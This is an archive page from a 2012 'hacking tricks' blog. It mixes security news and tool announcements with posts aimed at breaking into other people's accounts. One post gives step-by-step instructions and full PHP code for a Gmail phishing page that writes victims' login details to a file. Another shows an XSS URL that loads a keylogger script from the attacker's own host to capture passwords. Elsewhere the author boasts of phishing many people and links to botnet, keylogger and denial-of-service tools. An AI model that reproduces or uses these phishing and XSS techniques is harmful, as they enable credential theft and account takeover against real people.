Facebook Hacking | Hacking Tools | Facebook Hacking Tool | Twitter Hacking | Crash Website | Hack Gmail Account
Home / Archives for June 2012

Download logkeys - Linux keylogger

Posted by Deepanker Verma Friday, June 29, 2012 0 comments
Logkeys is a linux keylogger (GNU/Linux systems only). It is no more advanced than other available linux keyloggers, but is a bit more up to date, it doesn't unreliably repeat keys and it should never crash your X. All in all, it just seems to work. It relies on event interface of the Linux input subsystem. Once set, it logs all common character and function keys, while also being fully aware of Shift and AltGr key modifiers. It works with serial as well as USB keyboards.

Categories:

Download Zemra Botnet

Posted by Deepanker Verma Thursday, June 28, 2012 0 comments
Zemra botnet pack is similar to the other available botnet packs like Zeus and ApyEye. Its command and control panel is hosted on the remote server and can be controlled from there. It was first appeared on underground forums in May 2012 and was detected by Symantec.
Categories: , ,

How to deal with your fake Facebook profile

Posted by Deepanker Verma Saturday, June 23, 2012 0 comments

I have seen many cases on Facebook in which some person create a fake Facebook account of some innocent person and use these fake profiles for abusing talks. Seeing your fake profile on Facebook sometimes create a trouble for you. And the condition goes worse if the fake profile does abusive talks and spread rumors. Most of the person use the same name even the same profile pic to create a fake profile. This makes it hard to distinguish the original and fake profile.
Categories:

PayPal Announced Bug Bounty Program

Posted by Deepanker Verma 0 comments

PayPal has also announced a bug bounty program for security researchers. Security researchers will be awarded for reporting vulnerabilities which might affect Paypal and its customers.

Categories: ,

Exodus Has Launched vulnerability acquisition program

Posted by Deepanker Verma Friday, June 22, 2012 0 comments

Exodus Intelligence has started a vulnerability acceptance program in which it will accept vulnerabilities submitted by security researchers around the world. Security researchers can submit their vulnerability findings to  the Exodus Intelligence Program and their work will be compensated. 
Categories:

Buffer Overflow vulnerability

Posted by Deepanker Verma Thursday, June 21, 2012 3 comments
Buffer Overflow tutorial

Buffer overflow vulnerabilities are one of the most common vulnerablities. For understanding buffer overflow you must have the knowledge of c or any other high level language.

Categories: ,

Email account hacking with PHISHING | Gmail, Yahoo, msn hacking

Posted by Deepanker Verma Monday, June 18, 2012 60 comments
Email account hacking with PHISHING | Gmail, Yahoo, msn hacking
How to hack Gmail account
How to hack Yahoo account
How to hack Facebook

This is my favourite trick for hacking email accounts. I used it on many people and most of people are hacked. Success of this trick depends on the art of sending fake links to other people. For using this trick you should have some idea of websites and its working. learn website working by using this link.
Categories: , , , , ,

How to create gmail phishing page | Gmail hacking

Posted by Deepanker Verma 3 comments
Phishing is one of the best way to hack gmail account. I had already posted some articles on phishing but few of those are not available due to post loss in website transfer. So i am writing an article again.


Download the phishing page from HERE


To create phishing page of gmail, first of all open gmail in your browser. Then click on file and then save as.





Now you have saved gmail login page to your system.


Now open the saved page in notepad or or any other html editor tool. Now search for form tag <form


You will see some thing like this <form id="gaia_loginform" action="https://accounts.google.com/ServiceLoginAuth" method="post"> The form is set to send the data to url given in action attribute.


Change action attribute to write.php


<form id="gaia_loginform" action="write.php" method="post"> Now form will send data to your write.php


Now create a file write.php in the same directory and write


<?php
header("Location: http://www.gmail.com/");
$handle = fopen("passes.txt", "a");
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Now create an account in a free hosting that support php and upload all the files to the server.
Categories: , ,

How to Hack Facebook Account

Posted by Deepanker Verma 82 comments
This is the question which i read daily in my inbox. All the people want to know how to hack Facebook account and i always suggest them to read hacking tutorials on my blog. But the main problem is that i post many hacking tricks but no one is specially for Facebook hacking. Many of the hacking tricks i posted are used in hacking Facebook accounts. But the problem is to think as this way. If you want to be a good hacker you should know how to implement all those things for your purpose. Now it So now i am going to describe how to get someone's Facebook account.
facebook hacking
Categories: , ,

Tab Napping, Easy way to send Phishing Pages

Posted by Deepanker Verma 8 comments
Phishing is the easiest and most popular way of email account hacking. But there is one thing that is always hard in this attack. We all know how to create fake login pages. But most of us fail while sending this phishing page to the victim. This is the most tricky part of the attack where most of the newbie fail.

 Read: Ideas by which we can send phishing pages to victim

 Now a days a new way of phishing is used by hackers. This is called tab napping. Tab napping is also written as Tab nabbing in most of other references. I also wrote about it in one of my previous posts. I also posted a JavaScript code which is used for Tab napping as a Tab napping script .
But many of my readers are still facing problems in this script. So i decided to write this post.
Categories: ,

How to crash small websites using RDOS | DOS tutorial

Posted by Deepanker Verma 32 comments
DOS TUTORIAL 
How to crash small websites using RDOS


Have you ever wanted to DOS attack on a website. Here I am going to write about a tool which is really helpful but it wouldn't be effective on big servers. 

Categories: , ,

Bot and botnets

Posted by Deepanker Verma 0 comments
The term bot, derived from “ro-bot” in its generic form. It is a script or set of scripts or a computer program which is designed to perform predefined functions repeatedly and automatically after being triggered intentionally or through a system infection. Bot runs automated tasks over internet. According to the type of working we can say that there are two of Bots.

Categories: ,

What is Proxy Server?

Posted by Deepanker Verma 0 comments
What is a Proxy Server?


It is a server that sits between a client application, such as a Web browser, and a real server for which client requested. Proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services. It intercepts all requests from client to the real server to see if it can fulfill the requests itself. If not, it forwards the request to the real server.In some cases, the proxy may alter the client's request or the server's response for various purposes.
Categories: , ,

How to send phishing page to the victim

Posted by Deepanker Verma 3 comments

How to send phishing page to the victim


Phishing is the most used trick for email account hacking but most of the people think this trick as not working. But in My opinion, this is the best and most successful trick for hacking. Trojans and keyloggers are detected by Antivirus programs but this one is not. The only thing about the phishing is how ou are creating the phishing page and sending it to the victim.
Categories: , , , ,

Collection of DOS attacking tools

Posted by Deepanker Verma 0 comments

DOS attack is also known as Denial Of Service attack in which attacker make the resource unavailable from the legit users. This attack is performed by flooding server request queue with false requests so that no valid user can request on the server. Thus server down. If we take a look on the biggest cyber attack of past few months, DOS attack was main. DOS attack is even more powerful when it is performed by the number of systems on the same server.
Categories: , ,

Avoid the Man In The Middle through ARP Spoofing | ArpON 2.2 released

Posted by Deepanker Verma 0 comments
avoid the Man In The Middle through ARP Spoofing | ArpON 2.2 released

ArpON (ARP handler inspection) is a portable handler daemon that make ARP secure in order to avoid the Man In The Middle (MITM) through ARP Spoofing/Poisoning attacks. It detects and blocks also derived attacks by it for more complex attacks, as: DHCP Spoofing, DNS Spoofing, WEB Spoofing, Session Hijacking and SSL/TLS Hijacking & co attacks.
Categories: , , ,

Infosec Institute Computer Forensic Course [Review]

Posted by Deepanker Verma Friday, June 15, 2012 0 comments

Computer Forensics is the branch of information security which deals with the data stored in digital media. It is used in the investigation of computer crimes and identifies, preserve, recover, analyze and present facts and opinions about the information. As we know that cyber crime is increasing day by day. So the rate by which cyber crime is increasing, need for the professionals who can do computer forensics duties is also increasing. This field of computer security is the best for the career.
Categories: ,

Found XSS Vulnerability in Blogger

Posted by Deepanker Verma Thursday, June 14, 2012 0 comments
I am a blogger and use Google's Blogger platform to publish my posts. This blog is also hosted on Blogger. Few days back, i noticed something strange on blogger. Then i tried to do some research on that.


After few minutes of research, I found XSS on blogger. 
Categories: , ,

Keylogging on a Website with XSS Keylogger

Posted by Deepanker Verma Sunday, June 10, 2012 0 comments

Keylogger is the tool which is used to record the key events. We all know about the keyloggers used int the computer to capture the keystrokes. But this tutorial guide you to create and use a keylogger on a website to capture all keystrokes on that page.


As the name suggest, It only works on the website that are XSS vulnerable. As we know that we can run our own scripts on those website which have XSS vulnerability. We use our Keylogging script on XSS vulnerable website.
For this attack we need three things:
  • Kelogging script.
  • XSS vulnerable website
  • A webhosting

First of all download Keylogging script from Here:


DOWNLOAD


Now create an account in any free hosting web host that supports PHP. PHP will be used to write keystrokes on a text file.


Now open Logger.js and change the URL of your script. Default URL is http://yourwebsite.com
Change it to your hosting URL. 




Now host all these scripts on your web host.


Now find a XSS vulnerable website website and include script link like this:


http://targetwebsite.com/search.php?q="<script src="http://yourwebsite.com/keylogger.js"></script>


Now if someone clicks on that link everything they type in on that page will go to the data.txt file. This script will capture all the keystroke and save it to the file with the help of PHP script.


If a website's login page is vulnerable to XSS attack, this script can be used to grab passwords

Categories: , ,

NinjaFirewall V1.0.6 Released

Posted by Deepanker Verma Friday, June 8, 2012 0 comments

NinjaFirewall is an advanced firewall software for PHP based applications. This is a powerful firewall software designed to protect all PHP applications from custom scripts to shopping cart softwares (osCommerce, Magento, VirtueMart etc) and also CMS applications (Joomla, WordPress etc). This software firewall supports PHP, osCommerce, Magento, VirtueMart, PrestaShop, Drupal, WordPress, Joomla, XCart, zendguard and iconCube.

Categories: , ,

Joomla Folder Scanner v.1.0b4 released

Posted by Deepanker Verma 0 comments

Joomla Folder Scanner is a scanning tool which is used to scan Joomla based websites. This tool detects components, modules, languages, templates and plugins (based on a list), in both, the public and the admin paths of the website.


This is an opensource project and anyone can contribute or send recommendations and bugs reports to support it.


Features of the tool:

  • Multithreaded support, speed up scanning up to 10x faster!
  • Scan admin and public directories.
  • Reveal installed components, languages, modules, plugins and templates.
  • No joomla user or admin access required.
  • Easily customizable.

Categories: , ,

F-Secure Tool to Remove DNSChanger Botnet

Posted by Deepanker Verma Sunday, June 3, 2012 0 comments
F-Secure has released a tool called DNS which is designed to scan and remove DNSChanger from the system. This tool scans the DNS settings of the system and compare the settings with the malicious settings of DNSChanger. This tool also can restore the DNS configuration to a clean state.


DNSChanger is a trojan which changes the DNS settings of the system and redirect system's request to some malicious websites.
Accoring to developers, "F-Secure DNS Check is a very lightweight application that was created in order to provide you with a simple means of restoring your computer's Domain Name System (DNS) configuration in case it was altered."


Categories: , ,

Phishing attacks with Google Docs

Posted by Deepanker Verma Friday, June 1, 2012 0 comments

Security researchers at Sophos labs found some phishing scams using Google Docs to steal Google account login details. Google Docs is the free service by Google which allow users to create online forms.
These are the few scams which are hitting users inbox and asking for login credentials. In the first example, email asks users to confirm their account to prevent service bloackage. The message reads:
Confirm your e-mail account please enter your Mailbox Details by clicking the link below:
[LINK]
Failure to provide details correctly will result to immediate closure of your mailbox account from our database.
Links points to a Google Docs form which is a phishing page to steal users' login details. See the snapshot of the form below:

See the phishing page which asks for users' passwords.
Gmail account password is really very important as it is linked to various of your Google Service. This is gonna hit you badly. So you must know how to protect yourself from these kind of risks.

At Sophos labs, security researchers have found many these kind of phishing scams which claims dufferent things but use Google Docs to steal users' Gmail login credentials. 
Google Docs service is available foe free so any user can create online form and use it. As the form will be hosted by Google, so most of the innocnt user believe on the forms expose their logini credentials to scmmers.


Categories: , ,
Featured FREE Resource:
X




Security Tools

Loading...
Share
Get This

About Me

My Photo
Deepanker Verma
I am Deepanker Verma. A computer geek, Security researcher blogger and software developer. I have deep interest and Information security and web development and try to learn new things. you will see my blogs on hackingtricks, TechlomediaWebtips and Usethistip.

I was also honoured by Apple, Ebay, Symantec, PandaSecurity and various other computer software giants for my security work for their company. I also contribute on some opensource projects regularly.

I also own a web app called NoteDIP that allows users to send self-destructive messages with password protection.

You can add me to circles to get my daily tips :)

View my complete profile

Partners

Blog Archive

Copyright © Hacking Tricks. All rights reserved. Blogger template designed by BLog Bamz